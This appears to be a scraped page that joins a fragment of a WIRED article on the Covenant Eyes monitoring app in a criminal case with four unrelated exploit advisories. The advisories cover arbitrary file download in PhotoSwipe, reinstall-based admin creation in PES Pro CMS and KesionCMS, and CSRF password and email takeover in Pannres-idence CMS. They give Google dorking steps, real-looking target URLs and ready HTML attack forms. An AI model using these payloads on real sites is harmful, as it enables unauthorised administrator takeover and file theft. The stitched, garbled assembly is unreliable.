Independent legal experts who spoke to WIRED say that the use of an app like Covenant Eyes stems from a lack of oversight over how courts deploy punitive surveillance technology and judges’ broad authority to impose monitoring conditions without real accountability. 

“There’s a black box around how all of this technology works and is deployed,” says Weisburd, of George Washington University. “We don’t know error rates, how the technology operates, or even if it’s reliable.” This leaves people vulnerable to faulty technology in high-stakes situations where their freedom hinges on the word of an app. 

This includes Hannah’s husband, who remains in jail based on an automated report from an app that is not meant to be used in criminal proceedings and is known to produce false positives. Hannah, meanwhile, is afraid to stop paying $18.99 a month for a subscription with Covenant Eyes, which is still installed on some of her family’s devices, recording everything they do.

An Anti-Porn App Put Him in Jail and His Family Under Surveillance

PhotoSwipe version 5.3.7 suffers from an arbitrary file download vulnerability.

    ===========================================================================================| # Title     : PhotoSwipe 5.3.7 Arbitrary File Download Vulnerability                    || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://photoswipe.com/                                                   |  | # Dork      :                                                                           |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : download?path=/uploads/images/support/download/index.php[+] Payload enables you to download empty files .[+] https://127.0.0.1/novakon.com.tw/common/frontend/download?path=/uploads/images/support/download/index.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

PhotoSwipe 5.3.7 Arbitrary File Download

PES Pro CMS version 1.9.7 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : PES Pro CMS - v1.9.7 Reinstall add admin Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://download1580.mediafire.com/3e3q3pr2g20g/jt6w98fdfyqk0s1/pes.zip                                             |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /install/?step=4 =====> http://127.0.0.1/zarabiarapl/install/?step=4[+] Set new user or password .[+] Admin panel : http://zarabiara.pl/admin-panel/index.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |                                                                                                                                      |=======================================================================================================================================

PES Pro CMS 1.9.7 Add Administrator

KesionCMS X version 9.5 suffers from an unauthenticated add administrator vulnerability.

====================================================================================================================================  
| # Title     : KesionCMS X9.5 Reinstall Add Admin Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |   
| # Vendor    : https://www.kesion.com/                                                                                            |    
| # Dork      : Powered by KesionCMS                                                                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /install/index.asp

[+] http://127.0.0.1/install/?action=s4 = add your information to login

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] Exploit :

[+] @t Line 09 & 16 change the domain name of target

    <head><title>  
            Hacked By indoushka  
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />  
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>  
        </head>  
        <body>    
 <form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form">  
        <div class="guide">  
         <div class="guidetitle">  
                </div>  
                <div class="clear"></div>  
              </div>  
          <div class="clear"></div>  
 <input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5"  />  
       <input type="hidden" name="DBlx" value=""  />  
       <input type="hidden" name="CkbData" value=""  />

              <input type="hidden" name="TxtDBName_a" value=""  />  
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

      <div id="http://www.tzxdcpv.com/install/?action=s4">

           </div>  
     <div class="clear"></div>  
     <div class="sjlist">  
      <h5>网站参数配置</h5>  
      <ul>  
        <li><span>网站名称：</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如：Kesion官方站</li>  
        <li><span>网站域名：</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        如http://www.kesion.com。  
        </li>  
        <li><span>安装目录：</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        系统会自动获取，建议不要修改。  
        </li>  
        <li><span>授 权 码：</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
        免费版本用户请留空或填“0”。  
        </li>  
        <li><span>后台目录：</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如：Manage,Admin，后面必须带"/"符号。</li>  
                <li><span> 后台登录验证码：</span>  
                 <input type="radio" name="isCode_a" value="True"  /> 启用    
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  
                </li>

                       <li><span>管理认证码：</span>  
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
                <font id="rzm" style="display:none">认证码：<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
      </ul>  
      <div class="clear"></div>  
      <h5>填写管理员信息</h5>  
      <ul>  
        <li><span>管理员账号：</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
        <li><span>管理员密码：</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
        <li><span>重复密码：</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
      </ul>  
      <div class="clear blank10"></div>

            <div style="padding:5px">  
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  
      </div>  
    </div>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

KesionCMS X 9.5 Add Administrator

Pannres-Idence CMS version 7.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Pannres-idence CMS 7.3 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |   
| # Vendor    : https://codecanyon.net/item/pannresidence-classified-ads-php-script/19960675?s_rank=189                            |    
| # Dork      : "Bylancer, All right reserved"                                                                                     |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html Will modify the password for the site manager, as well as change the e-mail.

[+] save code as poc.html .

<form class="form-horizontal" action="http://127.0.0.1/pannresidencecom/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">  
                                    </div>  
                                </div>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>  
                                </div>

                                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>  
                                </div>

                                                            </fieldset>

                            <div class="">  
                                <div class="row">  
                                    <div class="col-md-12">  
                                        <button class="btn btn-default" type="clear">  
                                            Cancel  
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">  
                                            <i class="fa fa-save"></i>  
                                            Submit  
                                        </button>  
                                    </div>  
                                </div>  
                            </div>

                        </form>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Tag

#google